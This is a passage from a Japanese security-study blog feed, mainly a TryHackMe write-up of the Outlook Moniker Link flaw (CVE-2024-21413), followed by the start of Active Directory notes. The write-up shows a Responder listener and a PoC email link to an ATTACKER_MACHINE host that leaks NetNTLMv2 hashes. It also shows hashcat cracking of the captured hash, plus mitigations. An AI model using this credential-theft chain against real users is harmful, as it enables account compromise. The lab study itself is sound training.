<figure class="wp-block-image size-full"><img decoding="async" width="558" height="206" src="https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark_Xmas.png" alt="Wireshark Xmasスキャンのフラグ画像" class="wp-image-552" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark_Xmas.png 558w, https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark_Xmas-300x111.png 300w" sizes="(max-width: 558px) 100vw, 558px" /></figure>



<h2 class="wp-block-heading">おまけ</h2>



<p>UDPスキャンでホストIPとターゲットIP以外に 239.255.255.250（SSDP<sup data-fn="674d942b-b510-49bd-81d1-861c1e2af7cc" class="fn"><a href="#674d942b-b510-49bd-81d1-861c1e2af7cc" id="674d942b-b510-49bd-81d1-861c1e2af7cc-link">1</a></sup>用マルチキャストアドレス）への通信を発見。</p>



<figure class="wp-block-image size-full"><img decoding="async" width="870" height="69" src="https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark_SSDP.png" alt="Wireshark 239.255.255.250充ての画像" class="wp-image-554" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark_SSDP.png 870w, https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark_SSDP-300x24.png 300w, https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark_SSDP-768x61.png 768w" sizes="(max-width: 870px) 100vw, 870px" /></figure>



<p>nmapはスキャン中に「このネットワーク内にUPnP<sup data-fn="01fd85ef-44fd-43bb-bb2c-5c1cd3b01ee1" class="fn"><a href="#01fd85ef-44fd-43bb-bb2c-5c1cd3b01ee1" id="01fd85ef-44fd-43bb-bb2c-5c1cd3b01ee1-link">2</a></sup>デバイスがいるか？」を自動的にチェックすることがあり、その時にこの宛先へ M-SEARCH * HTTP/1.1 パケットを送信するそう。</p>


<ol class="wp-block-footnotes"><li id="674d942b-b510-49bd-81d1-861c1e2af7cc">家庭内ネットワークなどで機器同士が自動的に見つけ合うための通信プロトコル。UPnPの一部として定義されており、主にUDPの1900番ポートを使う。 <a href="#674d942b-b510-49bd-81d1-861c1e2af7cc-link" aria-label="脚注参照1にジャンプ">↩︎</a></li><li id="01fd85ef-44fd-43bb-bb2c-5c1cd3b01ee1">Universal Plug and Play。家庭やオフィス内のネットワーク機器が自動的に見つけ合い、設定なしで通信できるようにする仕組み。 <a href="#01fd85ef-44fd-43bb-bb2c-5c1cd3b01ee1-link" aria-label="脚注参照2にジャンプ">↩︎</a></li></ol>]]></content:encoded>
					
					<wfw:commentRss>https://cybermemo.blog/nmap-port-scan/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>TryHackMe Moniker Link (CVE-2024-21413) — 学習メモ</title>
		<link>https://cybermemo.blog/tryhackme-moniker-link-cve-2024-21413</link>
					<comments>https://cybermemo.blog/tryhackme-moniker-link-cve-2024-21413#respond</comments>
		
		<dc:creator><![CDATA[miyuki]]></dc:creator>
		<pubDate>Tue, 07 Oct 2025 13:39:45 +0000</pubDate>
				<category><![CDATA[TryHackMe]]></category>
		<category><![CDATA[セキュリティ]]></category>
		<category><![CDATA[Credential Theft]]></category>
		<category><![CDATA[hashcat]]></category>
		<category><![CDATA[Responder]]></category>
		<guid isPermaLink="false">https://cybermemo.blog/?p=429</guid>

					<description><![CDATA[<p><img src="https://cybermemo.blog/wp-content/uploads/2025/09/TryHackMe用アイキャッチ.png" class="webfeedsFeaturedVisual" /></p>はじめに Moniker Link (CVE-2024-21413) の備忘録。本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。 本記事の内容は教育目的のみに記載しています。実環境での悪用は [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><img src="https://cybermemo.blog/wp-content/uploads/2025/09/TryHackMe用アイキャッチ.png" class="webfeedsFeaturedVisual" /></p>
<h2 class="wp-block-heading">はじめに</h2>



<p>Moniker Link (CVE-2024-21413) の備忘録。<br>本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。</p>



<p class="is-style-icon_info"><strong>本記事の内容は教育目的のみに記載しています。実環境での悪用は犯罪行為です。必ず許可された演習環境でのみ実践してください。</strong></p>


<div class="swell-block-postLink">			<div class="p-blogCard -external" data-type="type3" data-onclick="clickLink">
				<div class="p-blogCard__inner">
					<span class="p-blogCard__caption">TryHackMe</span>
					<div class="p-blogCard__thumb c-postThumb"><figure class="c-postThumb__figure"><img decoding="async" src="https://tryhackme-images.s3.amazonaws.com/room-icons/f733b93431c63c39d9eac0e5c0065b8a.png" alt="" class="c-postThumb__img u-obf-cover" width="320" height="180"></figure></div>					<div class="p-blogCard__body">
						<a class="p-blogCard__title" href="https://tryhackme.com/room/monikerlink" target="_blank" rel="noopener noreferrer">Moniker Link (CVE-2024-21413)</a>
						<span class="p-blogCard__excerpt">Leak user&#8217;s credentials using CVE-2024-21413 to bypass Outlook&#8217;s Protected View.</span>					</div>
				</div>
			</div>
		</div>


<h2 class="wp-block-heading">Moniker Link (CVE-2024-21413)&nbsp;</h2>



<h3 class="wp-block-heading">Moniker Link（モニカー・リンク）とは</h3>



<p>Moniker Link は Windows のComponent Object Model（COM）<sup data-fn="3ec11f9f-9082-459c-9d59-55eeb29ec4bb" class="fn"><a href="#3ec11f9f-9082-459c-9d59-55eeb29ec4bb" id="3ec11f9f-9082-459c-9d59-55eeb29ec4bb-link">1</a></sup>で使われる「モニカー（識別子）」を指す仕組みの一種で、Outlook がメール中の特定のリンク（例えば file:// で始まるリンク）を処理するときに Moniker Link として解釈されることがある。<br><br>特定の形式（末尾に ! を含める等）にすると Outlook の「Protected View（保護ビュー／保護モード）」を回避してしまいリモートのファイルを読み込みにいってしまう問題が見つかった。これを悪用するとユーザーの認証情報（netNTLMv2 ハッシュ）を攻撃者に送らせることができる。</p>



<h3 class="wp-block-heading">CVE-2024-21413</h3>



<p>Outlook が特定のリンク（特に file:// スキームで始まり、後に ! 記号を含むような形式）を解釈すると、リンク先リソースにアクセスを試み、その過程で NTLM 認証情報（netNTLMv2 ハッシュ）を自動的に送信してしまうという挙動が発生するように設計上の欠陥があることが発見された。</p>



<p>さらに、悪意あるリンクを使えば Protected View（保護モード／読み取り専用モード）をバイパスして、ファイルを編集モードで開かせる・実行させるような挙動を誘導でき、その結果、リモートコード実行（Remote Code Execution, RCE）を引き起こす可能性も指摘されている。</p>



<h3 class="wp-block-heading">実演</h3>



<h4 class="wp-block-heading">Responder で待ち受け</h4>



<p>まずは Responder<sup data-fn="a99e74d6-1d5a-401c-b20b-6553246d547e" class="fn"><a href="#a99e74d6-1d5a-401c-b20b-6553246d547e" id="a99e74d6-1d5a-401c-b20b-6553246d547e-link">2</a></sup> で待ち受け。</p>



<pre class="wp-block-code"><code># インターフェースの特定
└─$ ip a
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    ~以下IP情報（マスク）~

2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc fq_codel state UP group default qlen 1000
    ~以下IP情報（マスク）~

3: tun0: &lt;POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP&gt; mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    ~以下IP情報（マスク）~

# tun0で待ち受け
sudo responder -I tun0 </code></pre>



<h4 class="wp-block-heading">exploit.py の編集</h4>



<p>GitHub のコードをコピペし編集。</p>


<div class="swell-block-postLink">			<div class="p-blogCard -external" data-type="type3" data-onclick="clickLink">
				<div class="p-blogCard__inner">
					<span class="p-blogCard__caption">GitHub</span>
					<div class="p-blogCard__thumb c-postThumb"><figure class="c-postThumb__figure"><img decoding="async" src="https://opengraph.githubassets.com/48b633b5db5651170851df09acd7c0a54c9bec02a5dae248b9f37fa1e13b4d79/CMNatic/CVE-2024-21413" alt="" class="c-postThumb__img u-obf-cover" width="320" height="180"></figure></div>					<div class="p-blogCard__body">
						<a class="p-blogCard__title" href="https://github.com/CMNatic/CVE-2024-21413" target="_blank" rel="noopener noreferrer">GitHub &#8211; CMNatic/CVE-2024-21413: CVE-2024-21413 PoC for THM Lab</a>
						<span class="p-blogCard__excerpt">CVE-2024-21413 PoC for THM Lab. Contribute to CMNatic/CVE-2024-21413 development by creating an account on GitHub.</span>					</div>
				</div>
			</div>
		</div>


<pre class="wp-block-code"><code># 行を表示しエディタを開く
nano -l exploit.py</code></pre>



<p>17行目の <strong>ATTACKER_MACHINE</strong> を 待ち受け端末のIPに変更。</p>



<pre class="wp-block-code"><code>&lt;p&gt;&lt;a href="file://<strong>ATTACKER_MACHINE(※ここをIPアドレスに変更)</strong>/test!exploit"&gt;Click me&lt;/a&gt;&lt;/p&gt;</code></pre>



<p>31行目の <strong>MAILSERVER</strong> をターゲットマシンのIPに変更。</p>



<pre class="wp-block-code"><code>server = smtplib.SMTP('<strong>MAILSERVER(※ここをIPアドレスに変更)</strong>', 25)</code></pre>



<h4 class="wp-block-heading">ターゲットマシンの Outlook を起動</h4>



<p>ターゲットマシンの Outlook を起動。</p>



<figure class="wp-block-image size-large is-resized"><img decoding="async" width="1024" height="339" src="https://cybermemo.blog/wp-content/uploads/2025/10/Outlook-1-1024x339.png" alt="Outlook を起動" class="wp-image-438" style="width:695px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/Outlook-1-1024x339.png 1024w, https://cybermemo.blog/wp-content/uploads/2025/10/Outlook-1-300x99.png 300w, https://cybermemo.blog/wp-content/uploads/2025/10/Outlook-1-768x254.png 768w, https://cybermemo.blog/wp-content/uploads/2025/10/Outlook-1.png 1253w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h4 class="wp-block-heading">exploit.py を実行</h4>



<p>exploit.py を実行。<br>このコードを実行するとターゲットマシンにメールが送信される。</p>



<pre class="wp-block-code"><code># exploit.py を実行
$ python3 exploit.py                                          
Enter your attacker email password: ********

 Email delivered</code></pre>



<h4 class="wp-block-heading">Outlook で届いたメールのリンクをクリック</h4>



<p>Outlook で届いたメールのリンクをクリック。<br>待ち受け端末に情報が送信される。</p>



<figure class="wp-block-image size-large is-resized"><img decoding="async" width="1024" height="557" src="https://cybermemo.blog/wp-content/uploads/2025/10/リンククリック-1-1024x557.png" alt="Outlook で届いたメールのリンクをクリック" class="wp-image-441" style="width:691px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/リンククリック-1-1024x557.png 1024w, https://cybermemo.blog/wp-content/uploads/2025/10/リンククリック-1-300x163.png 300w, https://cybermemo.blog/wp-content/uploads/2025/10/リンククリック-1-768x418.png 768w, https://cybermemo.blog/wp-content/uploads/2025/10/リンククリック-1.png 1264w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h4 class="wp-block-heading">Responder の確認</h4>



<p>Responder で netNTLMv2 ハッシュがキャプチャされている。</p>



<pre class="wp-block-code"><code>&#91;SMB] NTLMv2-SSP Client   : x.x.x.x
&#91;SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme
&#91;SMB] NTLMv2-SSP Hash     : tryhackme::THM-MONIKERLINK:a2b23215af9cc5d0:<strong>ハッシュが表示される  </strong>                                         
&#91;*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
&#91;*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
&#91;*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
&#91;*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
&#91;*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
&#91;*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
&#91;*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
&#91;*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme</code></pre>



<h4 class="wp-block-heading">エラーが発生する</h4>



<p>test!exploit のような共有は存在しないため、Outlook は「We can&#8217;t find &#8216;&#8230;\test!exploit&#8217;」というエラーを出す。<br>これはファイルが無いことを示す正常な挙動。ただし、重要なのはエラーが表示される前にクライアントは外部ホストへ接続を試み、NTLMによる認証ハンドシェイクが発生する点。攻撃者はこのハンドシェイクで得られるチャレンジ／レスポンスの情報を受け取る。</p>



<figure class="wp-block-image size-full"><img decoding="async" width="621" height="110" src="https://cybermemo.blog/wp-content/uploads/2025/10/おまけ.png" alt="We can't find '...\test!exploit' エラー" class="wp-image-443" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/おまけ.png 621w, https://cybermemo.blog/wp-content/uploads/2025/10/おまけ-300x53.png 300w" sizes="(max-width: 621px) 100vw, 621px" /></figure>



<h3 class="wp-block-heading">対策</h3>



<p>一部対策を紹介。</p>



<h4 class="wp-block-heading">公式修正を適用する</h4>



<p>Microsoft が公開しているセキュリティ更新を適用。</p>


<div class="swell-block-postLink">			<div class="p-blogCard -external -noimg" data-type="type3" data-onclick="clickLink">
				<div class="p-blogCard__inner">
					<span class="p-blogCard__caption">あわせて読みたい</span>
										<div class="p-blogCard__body">
						<a class="p-blogCard__title" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413?utm_source=chatgpt.com" target="_blank" rel="noopener noreferrer">Security Update Guide &#8211; Microsoft Security Response Center</a>
						<span class="p-blogCard__excerpt"></span>					</div>
				</div>
			</div>
		</div>


<h4 class="wp-block-heading">カスタムルールで検出</h4>



<p>GitHub 上でFlorian Roth 氏によって作成・公開された YARA<sup data-fn="1f0c2584-3f13-40b2-8901-c42c0e49bb1e" class="fn"><a href="#1f0c2584-3f13-40b2-8901-c42c0e49bb1e" id="1f0c2584-3f13-40b2-8901-c42c0e49bb1e-link">3</a></sup> ルールが利用可能。</p>


<div class="swell-block-postLink">			<div class="p-blogCard -external" data-type="type3" data-onclick="clickLink">
				<div class="p-blogCard__inner">
					<span class="p-blogCard__caption">GitHub</span>
					<div class="p-blogCard__thumb c-postThumb"><figure class="c-postThumb__figure"><img decoding="async" src="https://opengraph.githubassets.com/c710b9b4da4cad12439b81a2d0ad80806ee9a368c53c1e30bae85d6b6848e532/Neo23x0/signature-base" alt="" class="c-postThumb__img u-obf-cover" width="320" height="180"></figure></div>					<div class="p-blogCard__body">
						<a class="p-blogCard__title" href="https://github.com/Neo23x0/signature-base/blob/master/yara/expl_outlook_cve_2024_21413.yar" target="_blank" rel="noopener noreferrer">signature-base/yara/expl_outlook_cve_2024_21413.yar at master · Neo23x0/signature-base</a>
						<span class="p-blogCard__excerpt">YARA signature and IOC database for my scanners and tools &#8211; Neo23x0/signature-base</span>					</div>
				</div>
			</div>
		</div>


<h2 class="wp-block-heading">疑問に思ったこと</h2>



<h3 class="wp-block-heading">なぜ netNTLMv2 ハッシュが取得されると危険なのか</h3>



<p>NTLM認証はチャレンジ／レスポンス方式で行われ、パスワードそのものは送信されない。<br>そのため、「ハッシュを取られても意味がないのでは？」と疑問に思った。<br>調べてみると、ハッシュが窃取されると次の攻撃に繋がるため危険だということが分かった。<br><br>例えば、<br>取得したハッシュ値をオフラインで解析（クラック）できる。<br>（オフラインで行うため検知されず、何度でも試行可能。）<br><br>また、受け取った認証情報を他のサービスへの認証にそのまま使える条件が揃えば、<br>リレー攻撃（Relay Attack<strong>）</strong>によって権限を横展開できる。<br><br>このようにハッシュの窃取自体が次の侵入の足掛かりになるため、危険性が高い。</p>



<h3 class="wp-block-heading">ハッシュではなくレスポンスが窃取されるのではないか</h3>



<p>「NTLM認証はレスポンスを返すので、レスポンスが窃取されるのであって、ハッシュは取られないのでは？」と疑問に思った。調べてみると表現の問題だったようで、正確にはチャレンジ（server_challenge）とレスポンス（response）がセットで窃取されているとのこと。</p>



<p>シーケンス図</p>



<pre class="wp-block-code"><code>ユーザー端末 (Client)            サーバ (Server)            攻撃者 (Attacker)
-------------------            -------------            ------------------
1. Negotiate -----------------&gt;                              （認証方式の提案）
                               2. ServerChallenge ----------&gt; （チャレンジ送信）
&lt;-- (Challenge) -------------  

3. Client: 内部計算
   - NTLMv2_hash = HMAC_MD5( NTLM_hash(PW), User+Domain )
   - ClientBlob = {timestamp, client_challenge, ...}
   - NTLMv2_response = HMAC_MD5( NTLMv2_hash, ServerChallenge ∥ ClientBlob )
                             
4. Client --------------------&gt; Server
   （NTLMv2_response ＋ ClientBlob を送信）
                            ↑
                            |  （同じレスポンスを攻撃者が待ち受けて受信可能）
                            |  攻撃者は名前解決/SMB等でこのやり取りを誘発・傍受
                            v
   Attacker captures: {<strong>ServerChallenge</strong>, <strong>NTLMv2_response</strong>, ClientBlob, Username, Domain, ClientIP}</code></pre>



<h2 class="wp-block-heading">おまけ</h2>



<p>窃取した netNTLMv2 ハッシュを rockyou.txt で辞書攻撃してみたが、パスワードは見つからなかった。</p>



<pre class="wp-block-code"><code># hashcat で辞書攻撃
$ hashcat -m 5600 -a 0 hashcat_test /usr/share/wordlists/rockyou.txt

# マスク済み出力（抜粋）
hashcat (v6.2.6) starting

Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: TRYHACKME::&lt;REDACTED_HASH>
Time.Started.....: Tue Oct  7 21:22:25 2025 (6 secs)
Speed.#1.........:  2317.3 kH/s
Recovered........: 0/1 (0.00%)
Progress.........: 14344385/14344385 (100.00%)

# 結果確認（回復済みパスワードの表示）
$ hashcat -m 5600 --show hashcat_test
# （出力が何もなければ、辞書で回復できていないことを意味する）</code></pre>


<ol class="wp-block-footnotes"><li id="3ec11f9f-9082-459c-9d59-55eeb29ec4bb">Microsoft が開発した Windows 上で動く部品（コンポーネント）同士をやり取りさせるための仕組み。 <a href="#3ec11f9f-9082-459c-9d59-55eeb29ec4bb-link" aria-label="脚注参照1にジャンプ">↩︎</a></li><li id="a99e74d6-1d5a-401c-b20b-6553246d547e">ネットワーク上の名前解決プロトコルを悪用して偽の応答を返し、資格情報（NTLM ハッシュ等）を収集するオープンソースのツール。 <a href="#a99e74d6-1d5a-401c-b20b-6553246d547e-link" aria-label="脚注参照2にジャンプ">↩︎</a></li><li id="1f0c2584-3f13-40b2-8901-c42c0e49bb1e">マルウェアや攻撃の痕跡（IoC：Indicator of Compromise）を検出するためのパターンマッチ用ルール言語。 <a href="#1f0c2584-3f13-40b2-8901-c42c0e49bb1e-link" aria-label="脚注参照3にジャンプ">↩︎</a></li></ol>]]></content:encoded>
					
					<wfw:commentRss>https://cybermemo.blog/tryhackme-moniker-link-cve-2024-21413/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>TryHackMe Active Directory Basics — 学習メモ</title>
		<link>https://cybermemo.blog/tryhackme-active-directory-basics</link>
					<comments>https://cybermemo.blog/tryhackme-active-directory-basics#respond</comments>
		
		<dc:creator><![CDATA[miyuki]]></dc:creator>
		<pubDate>Sun, 05 Oct 2025 08:11:46 +0000</pubDate>
				<category><![CDATA[TryHackMe]]></category>
		<category><![CDATA[セキュリティ]]></category>
		<category><![CDATA[Active Directory]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[システム管理]]></category>
		<guid isPermaLink="false">https://cybermemo.blog/?p=329</guid>

					<description><![CDATA[<p><img src="https://cybermemo.blog/wp-content/uploads/2025/09/TryHackMe用アイキャッチ.png" class="webfeedsFeaturedVisual" /></p>はじめに Active Directory Basics の備忘録。本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。 Active Directoryの基礎 Active Directory [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><img src="https://cybermemo.blog/wp-content/uploads/2025/09/TryHackMe用アイキャッチ.png" class="webfeedsFeaturedVisual" /></p>
<h2 class="wp-block-heading">はじめに</h2>



<p>Active Directory Basics の備忘録。<br>本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。</p>


<div class="swell-block-postLink">			<div class="p-blogCard -external" data-type="type3" data-onclick="clickLink">
				<div class="p-blogCard__inner">
					<span class="p-blogCard__caption">TryHackMe</span>
					<div class="p-blogCard__thumb c-postThumb"><figure class="c-postThumb__figure"><img decoding="async" src="https://tryhackme-images.s3.amazonaws.com/room-icons/66704dd0e54a1f39bff7b1a1-1735574588674" alt="" class="c-postThumb__img u-obf-cover" width="320" height="180"></figure></div>					<div class="p-blogCard__body">
						<a class="p-blogCard__title" href="https://tryhackme.com/room/winadbasics" target="_blank" rel="noopener noreferrer">Active Directory Basics</a>
						<span class="p-blogCard__excerpt">This room will introduce the basic concepts and functionality provided by Active Directory.</span>					</div>
				</div>
			</div>
		</div>


<h2 class="wp-block-heading">Active Directoryの基礎</h2>



<h3 class="wp-block-heading">Active Directory<strong>とは</strong></h3>



<p>Active Directory は企業や組織のユーザーやパソコンをまとめて管理するサービス。</p>



<h4 class="wp-block-heading">何ができるか</h4>



<p><strong>住所録の役割</strong><br>・社員（ユーザー）<br>・パソコンやサーバー（コンピューター）<br>・プリンタなどの機器<br>これらを「誰が」「どこに」「どういう権限で」存在するのか、まとめて記録。</p>



<p><strong>鍵の役割</strong><br>・社員が会社のパソコンにログインするとき<br>・社員が社内のファイルサーバーにアクセスするとき<br>IDとパスワードをチェックし、その人が使えるものだけ使わせるように制御。</p>



<h4 class="wp-block-heading">Active Directory の主な機能</h4>



<p>ユーザー管理：社員アカウントを一元管理<br>コンピューター管理：PCやサーバーをまとめて管理<br>認証（ログインチェック）：誰が正しいユーザーか確認<br>権限付与（アクセス制御）：どこまで操作できるか決定<br>ポリシー配布（GPO）：全社PCに一括でルール設定（例：パスワードは10文字以上）</p>



<h3 class="wp-block-heading">Windowsドメインとは</h3>



<p>組織全体のPCとユーザーをまとめたグループ。</p>



<h4 class="wp-block-heading">ドメインコントローラー（DC）</h4>



<p>ドメインの中心にいるのが ドメインコントローラー (Domain Controller, DC)。<br>これは Active Directory が入った Windows サーバーで、以下の役割がある。<br><br>誰がログインできるか認証する<br>ユーザーやPCの情報を記録する<br>セキュリティポリシーを配布する</p>



<h4 class="wp-block-heading">ドメインに参加するとどうなるか</h4>



<p>会社のPCを「ドメインに参加」させると、<br>そのPCはドメインコントローラーのルールに従うようになる。<br><br>社員がどのPCからログインしても、同じIDとパスワードで入れる<br>営業部の人だけ営業フォルダを見れる、といった権限管理ができる<br>パスワードの長さやWindows Updateの設定を一括で適用できる</p>



<h3 class="wp-block-heading">Active Directory のオブジェクト</h3>



<p>Active Directory の世界ではネットワーク上に存在するものはすべて「オブジェクト」 として管理される。</p>



<h4 class="wp-block-heading"><strong>代表的なオブジェクト</strong></h4>



<p>ユーザー (User)<br>社員や管理者など人を表すオブジェクト<br>ユーザーはセキュリティプリンシパル（認証され、権限を持てるオブジェクト）<br>ユーザーは2種類に分けられる<br>People：社員など、人間がログインするためのユーザー<br>Services：サービス（IIS、MSSQL など）を動かすために使うユーザー</p>



<p>コンピュータ (Computer)<br>ドメインに参加したPCやサーバーを表すオブジェクト<br>例：PC01$ のように末尾に「$」が付く<br>OS自身が使うアカウントで、人間が直接ログインすることは想定されていない</p>



<p>セキュリティグループ (Security Groups)<br>複数のユーザーやコンピュータをまとめて管理する入れ物<br>1人ずつ権限を与えるよりグループ単位でアクセス制御する方が効率的</p>



<p>OU（組織単位：Organizational Unit）<br>部署やチームごとにユーザーやコンピュータをまとめる入れ物<br>例：「IT部門」「営業部門」など<br>OUにポリシーを適用すると所属するユーザーやPCに自動で反映される</p>



<h4 class="wp-block-heading">セキュリティグループ (Security Groups)</h4>



<p>アクセス権限をまとめて管理するためのグループ。</p>



<p><strong>代表的なデフォルトセキュリティグループ</strong></p>



<figure class="wp-block-table"><table class="has-fixed-layout"><thead><tr><th>グループ名</th><th>役割</th></tr></thead><tbody><tr><td><strong>Domain Admins</strong></td><td>ドメイン全体の管理者。DCを含めて何でもできる最強権限</td></tr><tr><td><strong>Enterprise Admins</strong></td><td>フォレスト全体を管理できる。複数ドメイン環境で使う</td></tr><tr><td><strong>Server Operators</strong></td><td>DCの管理が可能。ただしグループ管理は不可</td></tr><tr><td><strong>Backup Operators</strong></td><td>ファイルの権限に関係なくバックアップが取れる</td></tr><tr><td><strong>Account Operators</strong></td><td>ユーザーやグループの作成・管理が可能</td></tr><tr><td><strong>Domain Users</strong></td><td>すべての通常ユーザーが所属。デフォルトでログオン可能</td></tr><tr><td><strong>Domain Computers</strong></td><td>ドメインに参加したすべてのコンピュータ</td></tr><tr><td><strong>Domain Controllers</strong></td><td>DCだけが入るグループ</td></tr></tbody></table></figure>



<h3 class="wp-block-heading">GPO（Group Policy Object）とは</h3>



<p>Windowsドメイン環境でユーザーやコンピュータに対して一括で設定を配布する仕組み。</p>



<h4 class="wp-block-heading">何ができるか</h4>



<p>セキュリティ系<br>パスワードポリシー（長さ・複雑さ・有効期限など）<br>アカウントロックアウトの回数制限<br>Windows Updateの自動適用<br><br>ユーザー環境系<br>デスクトップの壁紙を会社のロゴに固定<br>コントロールパネルの使用禁止<br>特定のアプリケーション起動を制御</p>



<p>コンピュータ設定系<br>共有フォルダの自動マウント<br>スクリーンセーバーや自動ロックの設定<br>ファイアウォールやサービスの動作ルール</p>



<h4 class="wp-block-heading">GPOの適用対象</h4>



<p>GPOは「どこにリンクするか」で適用対象が決まる。<br><br>ドメイン全体（例：すべてのユーザーにパスワードポリシーを適用）<br>OU単位（例：営業部PCだけUSBメモリを禁止）<br>サブOUも継承（OUにリンクしたら、その下のOUにも適用される）</p>



<h4 class="wp-block-heading">仕組み</h4>



<p>1.管理者が GPMC（Group Policy Management Console） でGPOを作成<br>2.そのGPOをOUやドメインにリンクする<br>3.ドメインに参加しているユーザーやPCが定期的にGPOを取得（gpupdate）<br>4.自動的に設定が適用される</p>



<p>配布される仕組みは SYSVOL 共有フォルダ（ドメインコントローラ上）を通じて行われる。</p>



<h3 class="wp-block-heading">認証方法</h3>



<h4 class="wp-block-heading">Kerberos認証</h4>



<p>Active DirectoryでユーザーがログオンするときWindowsは内部で「Kerberos（ケルベロス）認証」という仕組みを使っている。</p>



<p><strong>Kerberosとは</strong></p>



<p>Kerberosはネットワーク上で「安全に」「何度もパスワードを送らずに」認証を行うためのプロトコル。<br>Windowsドメインでは標準の認証方式として使われている。<br><br>例えば、会社のパソコンで一度ログインした後、ファイルサーバーやプリンタ、社内サイトにアクセスしても再びパスワードを入力する必要がないのはこのKerberosが動いているから。</p>



<p><strong>Kerberosの仕組み</strong></p>



<p class="is-style-bg_stripe">用語</p>



<p>Client（クライアント）：ユーザーが操作するPC<br>KDC（Key Distribution Center）：認証の中心となる仕組み。ドメインコントローラー（DC）上で動作<br>Service（サーバー）：ファイル共有やデータベースなどの利用したいリソース<br>TGT（Ticket Granting Ticket）：サービス用チケットをもらうためのチケット<br>TGS（Ticket Granting Service Ticket）：実際にサービスへアクセスするためのチケット</p>



<p class="is-style-bg_stripe">仕組み</p>



<p class="is-style-sticky_box">Step 1：TGT（チケット発行チケット）をもらう</p>



<p>ユーザーはまず「ユーザー名」と「タイムスタンプ（時刻情報）」を自分のパスワードから作られた鍵で暗号化してKDCに送る。これが「TGTをください」というリクエスト。<br><br>KDC（ドメインコントローラー）はユーザー情報を確認し、<br>TGT（Ticket Granting Ticket）<br>セッションキー（Session Key）<br>をユーザーに返す。</p>



<p class="is-style-big_icon_point">TGTは「krbtgt」という特別なアカウントのパスワードハッシュで暗号化されており、<br>ユーザー自身は中身を確認できない。</p>



<p class="is-style-sticky_box">Step 2：TGS（サービス用チケット）をもらう</p>



<p>次にユーザーが特定のサービス（例えば「ファイル共有サーバー」や「MSSQL」）を使いたいとき、<br>手に入れたTGTを使ってKDCにリクエスト。<br><br>リクエストには以下が含まれる：<br>ユーザー名とタイムスタンプ（セッションキーで暗号化）<br>取得済みのTGT<br>SPN（Service Principal Name：接続したいサービス名）<br><br>KDCはそれを受け取り、<br>TGS（サービスチケット）<br>サービスセッションキー（Svc Session Key）<br>を発行して返す。</p>



<p class="is-style-big_icon_point">TGSはそのサービスの「所有者アカウント（Service Owner）」のハッシュで暗号化されており、<br>サービスだけが中身を復号できる。</p>



<p class="is-style-sticky_box">Step 3：サービスへのアクセス</p>



<p>最後にユーザーは受け取ったTGSを使ってサービスに接続。<br>サービスは自分の「Service Owner Hash」でTGSを復号し、ユーザーを認証。<br><br>これによりパスワードを再送することなく、安全にサービスを利用可能。</p>



<p class="is-style-sticky_box">要約</p>


<div class="swell-block-balloon"><div class="c-balloon -bln-left" data-col="blue"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/client.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/client.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">Client</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>KDCさん、私は <em>Username + Timestamp</em> を自分のパスワード鍵で暗号化して送ります。身分証（TGT）をください！</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-right" data-col="green"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/KDC-1.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/KDC-1.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">KDC</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>確認できました。これは TGT と Session Key です。TGT は krbtgt のハッシュ で暗号化してありますよ。</p>
